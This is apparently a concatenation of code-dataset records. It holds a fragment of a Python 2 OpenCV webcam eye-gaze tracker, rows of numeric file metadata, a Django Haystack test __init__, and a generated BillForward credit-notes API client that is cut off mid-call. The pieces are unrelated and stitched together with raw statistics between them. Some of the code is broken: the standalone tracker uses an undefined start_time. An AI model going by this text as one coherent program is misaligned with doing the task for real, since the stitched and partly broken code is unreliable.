                cv2.line(frame, (x,y), ((x+w,y+h)), (0,0,255),1)
                cv2.line(frame, (x+w,y), ((x,y+h)), (0,0,255),1)
                cv2.rectangle(frame, (x+(w/5), y+(h)), (x+(w*4/5), y+(h*3/4)), (0,0,255), 1)
                #cv2.imshow('frame2',frame)
                pupilFrame = cv2.equalizeHist(frame[int(y+(h*.25)):(y+h), x:(x+w)])
                cv2.line(frame, (x+(w/2),0), (x+(w/2),y+h), (0,0,255),1)
                cv2.line(frame, (0,y+(h/2)), (x+w,y+(h/2)), (0,0,255),1)
                # crop the central part of the detection as the eye region
                eye = frame[(y+(h/3)):(y+(h*2/3)), (x+(w/4)):(x+(w*3/4))]
                eye = cv2.equalizeHist(eye)
                h, w = eye.shape
                eye = cv2.flip(eye, 1)
                cv2.imshow("Eye", eye)
                # split the eye region into four quadrants for darkness scoring
                topleft = eye[0:h/2, 0:w/2]
                topright = eye[0:h/2, w/2:w]
                bottomleft = eye[h/2:h, 0:w/2]
                bottomright = eye[h/2:h, w/2:w]
                #cv2.imshow("eye", eye)
                cv2.moveWindow("Eye", 100, 100)
                # print eye[0, 0]
                # print eye[h-1,w-1]
                # print eye[0,w-1]
                # print eye[h-1,0]
                # print "------------"
                startx = 0
                starty = 0
                # cv2.imshow("top left", topleft)
                # cv2.moveWindow("top left", startx, starty)
                # cv2.imshow("top right", topright)
                # cv2.moveWindow("top right", w/2, starty)
                # cv2.imshow("bottom left", bottomleft)
                # cv2.moveWindow("bottom left", startx, h*2)
                # cv2.imshow("bottom right", bottomright)
                # cv2.moveWindow("bottom right", w/2, h*2)
                quadrants = [[topleft, topright],
                            [bottomleft, bottomright]]
                if(count<testSize):
                    # still accumulating baseline frames
                    baseline += np.array(process(quadrants))
                elif(count == testSize):
                    baseline/=testSize
                    print "Done with Baseline"
                else:
                    # compare this frame's darkness against the baseline; the
                    # quadrant that darkened the most indicates gaze direction
                    difference = np.array(process(quadrants))-np.array(baseline)
                    #difference = np.absolute(difference)
                    max = np.amax(difference)
                    index = np.where(difference==max)
                    difference = list(difference)
                    index = list(index)
                    max = difference[index[0][0]][index[1][0]]
                    #print max
                    if(max<75):
                        #print "Straight Ahead"
                        eyeMovement.append(0)
                        continue
                    for j in range(0, len(quadrants)):
                        for k in range(0, len(quadrants[0])):
                            quadrants[j][k] = replace(quadrants[j][k], difference[j][k], max)
                    # map the darkest quadrant's (row, column) to a direction code
                    if(index[0].any() == 0):
                        if(index[1].any() == 1):
                            eyeMovement.append(2)
                            #print "Top Right"
                            k = 1
                        else:
                            k = 1
                            eyeMovement.append(1)
                            #print "Top Left"
                    else:
                        if(index[1].any() == 1):
                            k = 1
                            eyeMovement.append(3)
                            #print "Bottom Right"
                        else:
                            k = 1
                            eyeMovement.append(4)
                            #print "Bottom Left"
                count+=1
                h*=2
                starty+=h
                starty+=(h/2)
                # cv2.imshow("top left1", quadrants[0][0])
                # cv2.moveWindow("top left1", startx, starty)
                # cv2.imshow("top right1", quadrants[0][1])
                # cv2.moveWindow("top right1", w/2, starty)
                # cv2.imshow("bottom left1", quadrants[1][0])
                # cv2.moveWindow("bottom left1", startx, h*2)
                # cv2.imshow("bottom right1", quadrants[1][1])
                # cv2.moveWindow("bottom right1", w/2, h*2)
        curr_time = time.time() - start_time
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    thread.join()
    return eyeMovement
def start_alone(seconds):
    # Same tracking loop as start(), but without the background audio
    # recorder thread.  NOTE(review): this is a near-verbatim copy of
    # start(); consider extracting the shared frame-processing logic.
    # Direction codes appended to the module-level eyeMovement list:
    #   0 = straight ahead, 1 = top left, 2 = top right,
    #   3 = bottom right, 4 = bottom left.
    cap = cv2.VideoCapture(0) #640,480
    w = 640
    h = 480
    # number of initial frames averaged into the per-quadrant darkness baseline
    testSize = 15
    curr_time = 0
    count = 0
    # [[top-left, top-right], [bottom-left, bottom-right]] darkness baseline
    baseline = np.array([[0,0],[0,0]])
    while(cap.isOpened() and curr_time < seconds):
        print curr_time
        ret, frame = cap.read()
        #print curr_time
        #print "-------------"
        if ret==True:
            #downsample
            #frameD = cv2.pyrDown(cv2.pyrDown(frame))
            #frameDBW = cv2.cvtColor(frameD,cv2.COLOR_RGB2GRAY)
            #detect face
            frame = cv2.cvtColor(frame,cv2.COLOR_RGB2GRAY)
            frame = frame[0:700, 200:1000]
            # NOTE(review): the Haar cascade is reloaded from disk on every
            # frame; hoisting it above the loop would be cheaper.
            faces = cv2.CascadeClassifier('haarcascade_eye.xml')
            detected = faces.detectMultiScale(frame, 1.3, 5)
            #faces = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
            # detected2 = faces.detectMultiScale(frameDBW, 1.3, 5)
            pupilFrame = frame
            pupilO = frame
            #
            windowClose = np.ones((5,5),np.uint8)
            windowOpen = np.ones((2,2),np.uint8)
            windowErode = np.ones((2,2),np.uint8)
            # draw square
            for (x,y,w,h) in detected:
                cv2.rectangle(frame, (x,y), ((x+w),(y+h)), (0,0,255),1)
                cv2.line(frame, (x,y), ((x+w,y+h)), (0,0,255),1)
                cv2.line(frame, (x+w,y), ((x,y+h)), (0,0,255),1)
                cv2.rectangle(frame, (x+(w/5), y+(h)), (x+(w*4/5), y+(h*3/4)), (0,0,255), 1)
                cv2.imshow('frame2',frame)
                pupilFrame = cv2.equalizeHist(frame[int(y+(h*.25)):(y+h), x:(x+w)])
                cv2.line(frame, (x+(w/2),0), (x+(w/2),y+h), (0,0,255),1)
                cv2.line(frame, (0,y+(h/2)), (x+w,y+(h/2)), (0,0,255),1)
                # crop the central part of the detection as the eye region
                eye = frame[(y+(h/3)):(y+(h*2/3)), (x+(w/4)):(x+(w*3/4))]
                eye = cv2.equalizeHist(eye)
                h, w = eye.shape
                eye = cv2.flip(eye, 1)
                #cv2.imshow("framss", eye)
                # split the eye region into four quadrants for darkness scoring
                topleft = eye[0:h/2, 0:w/2]
                topright = eye[0:h/2, w/2:w]
                bottomleft = eye[h/2:h, 0:w/2]
                bottomright = eye[h/2:h, w/2:w]
                #cv2.imshow("eye", eye)
                #cv2.moveWindow("framss", 600, 600)
                # print eye[0, 0]
                # print eye[h-1,w-1]
                # print eye[0,w-1]
                # print eye[h-1,0]
                # print "------------"
                startx = 0
                starty = 0
                # cv2.imshow("top left", topleft)
                # cv2.moveWindow("top left", startx, starty)
                # cv2.imshow("top right", topright)
                # cv2.moveWindow("top right", w/2, starty)
                # cv2.imshow("bottom left", bottomleft)
                # cv2.moveWindow("bottom left", startx, h*2)
                # cv2.imshow("bottom right", bottomright)
                # cv2.moveWindow("bottom right", w/2, h*2)
                quadrants = [[topleft, topright],
                            [bottomleft, bottomright]]
                if(count<testSize):
                    # still accumulating baseline frames
                    baseline += np.array(process(quadrants))
                elif(count == testSize):
                    baseline/=testSize
                    print "Done with Baseline"
                else:
                    # compare this frame's darkness against the baseline; the
                    # quadrant that darkened the most indicates gaze direction
                    difference = np.array(process(quadrants))-np.array(baseline)
                    #difference = np.absolute(difference)
                    max = np.amax(difference)
                    index = np.where(difference==max)
                    difference = list(difference)
                    index = list(index)
                    max = difference[index[0][0]][index[1][0]]
                    #print max
                    if(max<75):
                        #print "Straight Ahead"
                        eyeMovement.append(0)
                        continue
                    for j in range(0, len(quadrants)):
                        for k in range(0, len(quadrants[0])):
                            quadrants[j][k] = replace(quadrants[j][k], difference[j][k], max)
                    # map the darkest quadrant's (row, column) to a direction code
                    if(index[0].any() == 0):
                        if(index[1].any() == 1):
                            eyeMovement.append(2)
                            #print "Top Right"
                            k = 1
                        else:
                            k = 1
                            eyeMovement.append(1)
                            #print "Top Left"
                    else:
                        if(index[1].any() == 1):
                            k = 1
                            eyeMovement.append(3)
                            #print "Bottom Right"
                        else:
                            k = 1
                            eyeMovement.append(4)
                            #print "Bottom Left"
                count+=1
                h*=2
                starty+=h
                starty+=(h/2)
                # cv2.imshow("top left1", quadrants[0][0])
                # cv2.moveWindow("top left1", startx, starty)
                # cv2.imshow("top right1", quadrants[0][1])
                # cv2.moveWindow("top right1", w/2, starty)
                # cv2.imshow("bottom left1", quadrants[1][0])
                # cv2.moveWindow("bottom left1", startx, h*2)
                # cv2.imshow("bottom right1", quadrants[1][1])
                # cv2.moveWindow("bottom right1", w/2, h*2)
        curr_time = time.time() - start_time
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    return eyeMovement
| 29.788644
| 93
| 0.590914
| 1,432
| 9,443
| 3.877095
| 0.118017
| 0.009726
| 0.012608
| 0.012968
| 0.852305
| 0.852305
| 0.852305
| 0.84402
| 0.84402
| 0.84402
| 0
| 0.067476
| 0.215292
| 9,443
| 317
| 94
| 29.788644
| 0.681781
| 0.271736
| 0
| 0.790476
| 0
| 0
| 0.015899
| 0
| 0
| 0
| 0.001178
| 0
| 0
| 0
| null | null | 0
| 0.02381
| null | null | 0.014286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8ae5c8692645d9d7e82fc99c5e0dff8d348fb6ca
| 152
|
py
|
Python
|
tests/simple_tests/tests/__init__.py
|
pbs/django-haystack
|
433e154f76a450ffc095792c6f2e051ef508fc2d
|
[
"BSD-3-Clause"
] | 2
|
2015-01-10T09:14:47.000Z
|
2018-11-19T13:45:55.000Z
|
tests/simple_tests/tests/__init__.py
|
ericholscher/django-haystack
|
1fde37afa4921c2121a95a4902f2012bbf837bf1
|
[
"BSD-3-Clause"
] | 1
|
2017-06-13T02:08:54.000Z
|
2017-06-13T02:22:15.000Z
|
tests/simple_tests/tests/__init__.py
|
ericholscher/django-haystack
|
1fde37afa4921c2121a95a4902f2012bbf837bf1
|
[
"BSD-3-Clause"
] | 2
|
2015-08-11T17:00:42.000Z
|
2021-01-04T08:39:33.000Z
|
import warnings
# Silence all warnings BEFORE the test modules are star-imported below,
# so deprecation noise raised at import time does not pollute test output.
warnings.simplefilter('ignore', Warning)
# Star-import the test cases so the test runner discovers them from this package.
from simple_tests.tests.simple_query import *
from simple_tests.tests.simple_backend import *
| 25.333333
| 47
| 0.835526
| 20
| 152
| 6.15
| 0.5
| 0.162602
| 0.243902
| 0.325203
| 0.422764
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085526
| 152
| 5
| 48
| 30.4
| 0.884892
| 0
| 0
| 0
| 0
| 0
| 0.039474
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c15aeb36ea9bbf28261e15d3f2aebfa198fb233a
| 33,584
|
py
|
Python
|
billforward/apis/creditnotes_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | 2
|
2016-11-23T17:32:37.000Z
|
2022-02-24T05:13:20.000Z
|
billforward/apis/creditnotes_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | null | null | null |
billforward/apis/creditnotes_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | 1
|
2016-12-30T20:02:48.000Z
|
2016-12-30T20:02:48.000Z
|
# coding: utf-8
"""
BillForward REST API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CreditnotesApi(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        # Fall back to the (process-wide) Configuration's client when no
        # explicit client is supplied, creating one lazily on first use.
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client

    def create_credit_note(self, credit_note, **kwargs):
        """
        Create a credit note.
        {\"nickname\":\"Create a new credit note\",\"request\":\"createCreditNoteRequest.html\",\"response\":\"createCreditNoteResponse.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.create_credit_note(credit_note, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param CreditNote credit_note: The credit note object to be created. (required)
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper: delegate to the *_with_http_info variant and strip the
        # (status, headers) extras so callers get just the deserialized body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            # Asynchronous path: return the request thread immediately.
            return self.create_credit_note_with_http_info(credit_note, **kwargs)
        else:
            (data) = self.create_credit_note_with_http_info(credit_note, **kwargs)
            return data

    def create_credit_note_with_http_info(self, credit_note, **kwargs):
        """
        Create a credit note.
        {\"nickname\":\"Create a new credit note\",\"request\":\"createCreditNoteRequest.html\",\"response\":\"createCreditNoteResponse.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.create_credit_note_with_http_info(credit_note, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param CreditNote credit_note: The credit note object to be created. (required)
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['credit_note']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Generated-code idiom: snapshot locals() (self, args, kwargs) into one
        # dict, then fold validated kwargs into it for uniform lookup below.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_credit_note" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'credit_note' is set
        if ('credit_note' not in params) or (params['credit_note'] is None):
            raise ValueError("Missing the required parameter `credit_note` when calling `create_credit_note`")

        resource_path = '/credit-notes'.replace('{format}', 'json')
        path_params = {}

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'credit_note' in params:
            body_params = params['credit_note']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['text/xml', 'application/xml', 'application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='CreditNotePagedMetadata',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def get_credit_note_by_id(self, credit_note_id, **kwargs):
        """
        Returns a single credit-note, specified by the ID parameter.
        {\"nickname\":\"Retrieve an existing credit note\",\"response\":\"getCreditNoteByID.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_credit_note_by_id(credit_note_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str credit_note_id: ID of the credit-note. (required)
        :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper over the *_with_http_info variant (see create_credit_note).
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.get_credit_note_by_id_with_http_info(credit_note_id, **kwargs)
        else:
            (data) = self.get_credit_note_by_id_with_http_info(credit_note_id, **kwargs)
            return data

    def get_credit_note_by_id_with_http_info(self, credit_note_id, **kwargs):
        """
        Returns a single credit-note, specified by the ID parameter.
        {\"nickname\":\"Retrieve an existing credit note\",\"response\":\"getCreditNoteByID.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_credit_note_by_id_with_http_info(credit_note_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str credit_note_id: ID of the credit-note. (required)
        :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['credit_note_id', 'organizations']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Validate kwargs against the endpoint's known parameters (see
        # create_credit_note_with_http_info for the locals() idiom).
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_credit_note_by_id" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'credit_note_id' is set
        if ('credit_note_id' not in params) or (params['credit_note_id'] is None):
            raise ValueError("Missing the required parameter `credit_note_id` when calling `get_credit_note_by_id`")

        resource_path = '/credit-notes/{credit-note-ID}'.replace('{format}', 'json')
        path_params = {}
        if 'credit_note_id' in params:
            path_params['credit-note-ID'] = params['credit_note_id']

        query_params = {}
        if 'organizations' in params:
            query_params['organizations'] = params['organizations']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['text/plain'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='CreditNotePagedMetadata',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def get_credit_note_for_account(self, account_id, **kwargs):
        """
        Returns credit notes for an account.
        {\"nickname\":\"Retrieve by account\",\"response\":\"getCreditNotesByAccount.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_credit_note_for_account(account_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str account_id: ID of the account. (required)
        :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
        :param int offset: The offset from the first payment to return.
        :param int records: The maximum number of payments to return.
        :param str order_by: Specify a field used to order the result set.
        :param str order: The direction of any ordering, either ASC or DESC.
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper over the *_with_http_info variant (see create_credit_note).
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.get_credit_note_for_account_with_http_info(account_id, **kwargs)
        else:
            (data) = self.get_credit_note_for_account_with_http_info(account_id, **kwargs)
            return data

    def get_credit_note_for_account_with_http_info(self, account_id, **kwargs):
        """
        Returns credit notes for an account.
        {\"nickname\":\"Retrieve by account\",\"response\":\"getCreditNotesByAccount.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_credit_note_for_account_with_http_info(account_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str account_id: ID of the account. (required)
        :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
        :param int offset: The offset from the first payment to return.
        :param int records: The maximum number of payments to return.
        :param str order_by: Specify a field used to order the result set.
        :param str order: The direction of any ordering, either ASC or DESC.
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['account_id', 'organizations', 'offset', 'records', 'order_by', 'order']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_credit_note_for_account" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'account_id' is set
        if ('account_id' not in params) or (params['account_id'] is None):
            raise ValueError("Missing the required parameter `account_id` when calling `get_credit_note_for_account`")

        resource_path = '/credit-notes/account/{account-ID}'.replace('{format}', 'json')
        path_params = {}
        if 'account_id' in params:
            path_params['account-ID'] = params['account_id']

        # Optional paging/ordering parameters are forwarded only when supplied.
        query_params = {}
        if 'organizations' in params:
            query_params['organizations'] = params['organizations']
        if 'offset' in params:
            query_params['offset'] = params['offset']
        if 'records' in params:
            query_params['records'] = params['records']
        if 'order_by' in params:
            query_params['order_by'] = params['order_by']
        if 'order' in params:
            query_params['order'] = params['order']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['text/plain'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='CreditNotePagedMetadata',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def get_credit_note_for_invoice(self, invoice_id, **kwargs):
        """
        Returns credit notes for an invoice.
        {\"nickname\":\"Retrieve by invoice\",\"response\":\"getCreditNotesByInvoice.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_credit_note_for_invoice(invoice_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str invoice_id: ID of the Invoice. (required)
        :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
        :param int offset: The offset from the first payment to return.
        :param int records: The maximum number of payments to return.
        :param str order_by: Specify a field used to order the result set.
        :param str order: The direction of any ordering, either ASC or DESC.
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper over the *_with_http_info variant (see create_credit_note).
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.get_credit_note_for_invoice_with_http_info(invoice_id, **kwargs)
        else:
            (data) = self.get_credit_note_for_invoice_with_http_info(invoice_id, **kwargs)
            return data

    def get_credit_note_for_invoice_with_http_info(self, invoice_id, **kwargs):
        """
        Returns credit notes for an invoice.
        {\"nickname\":\"Retrieve by invoice\",\"response\":\"getCreditNotesByInvoice.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     >>> pprint(response)
        >>>
        >>> thread = api.get_credit_note_for_invoice_with_http_info(invoice_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str invoice_id: ID of the Invoice. (required)
        :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
        :param int offset: The offset from the first payment to return.
        :param int records: The maximum number of payments to return.
        :param str order_by: Specify a field used to order the result set.
        :param str order: The direction of any ordering, either ASC or DESC.
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['invoice_id', 'organizations', 'offset', 'records', 'order_by', 'order']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_credit_note_for_invoice" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'invoice_id' is set
        if ('invoice_id' not in params) or (params['invoice_id'] is None):
            raise ValueError("Missing the required parameter `invoice_id` when calling `get_credit_note_for_invoice`")

        resource_path = '/credit-notes/invoice/{invoice-ID}'.replace('{format}', 'json')
        path_params = {}
        if 'invoice_id' in params:
            path_params['invoice-ID'] = params['invoice_id']

        # Optional paging/ordering parameters are forwarded only when supplied.
        query_params = {}
        if 'organizations' in params:
            query_params['organizations'] = params['organizations']
        if 'offset' in params:
            query_params['offset'] = params['offset']
        if 'records' in params:
            query_params['records'] = params['records']
        if 'order_by' in params:
            query_params['order_by'] = params['order_by']
        if 'order' in params:
            query_params['order'] = params['order']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['text/plain'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='CreditNotePagedMetadata',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def get_credit_note_for_subscription(self, subscription_id, **kwargs):
        """
        Returns credit notes for a subscription.
        {\"nickname\":\"Retrieve by subscription\",\"response\":\"getCreditNotesSubscription.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_credit_note_for_subscription(subscription_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str subscription_id: ID of the subscription. (required)
        :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
        :param int offset: The offset from the first payment to return.
        :param int records: The maximum number of payments to return.
        :param str order_by: Specify a field used to order the result set.
        :param str order: The direction of any ordering, either ASC or DESC.
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper over the *_with_http_info variant (see create_credit_note).
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.get_credit_note_for_subscription_with_http_info(subscription_id, **kwargs)
        else:
            (data) = self.get_credit_note_for_subscription_with_http_info(subscription_id, **kwargs)
            return data

    def get_credit_note_for_subscription_with_http_info(self, subscription_id, **kwargs):
        """
        Returns credit notes for a subscription.
        {\"nickname\":\"Retrieve by subscription\",\"response\":\"getCreditNotesSubscription.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_credit_note_for_subscription_with_http_info(subscription_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str subscription_id: ID of the subscription. (required)
        :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
        :param int offset: The offset from the first payment to return.
        :param int records: The maximum number of payments to return.
        :param str order_by: Specify a field used to order the result set.
        :param str order: The direction of any ordering, either ASC or DESC.
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['subscription_id', 'organizations', 'offset', 'records', 'order_by', 'order']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_credit_note_for_subscription" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'subscription_id' is set
        if ('subscription_id' not in params) or (params['subscription_id'] is None):
            raise ValueError("Missing the required parameter `subscription_id` when calling `get_credit_note_for_subscription`")

        resource_path = '/credit-notes/subscription/{subscription-ID}'.replace('{format}', 'json')
        path_params = {}
        if 'subscription_id' in params:
            path_params['subscription-ID'] = params['subscription_id']

        # Optional paging/ordering parameters are forwarded only when supplied.
        query_params = {}
        if 'organizations' in params:
            query_params['organizations'] = params['organizations']
        if 'offset' in params:
            query_params['offset'] = params['offset']
        if 'records' in params:
            query_params['records'] = params['records']
        if 'order_by' in params:
            query_params['order_by'] = params['order_by']
        if 'order' in params:
            query_params['order'] = params['order']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['text/plain'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
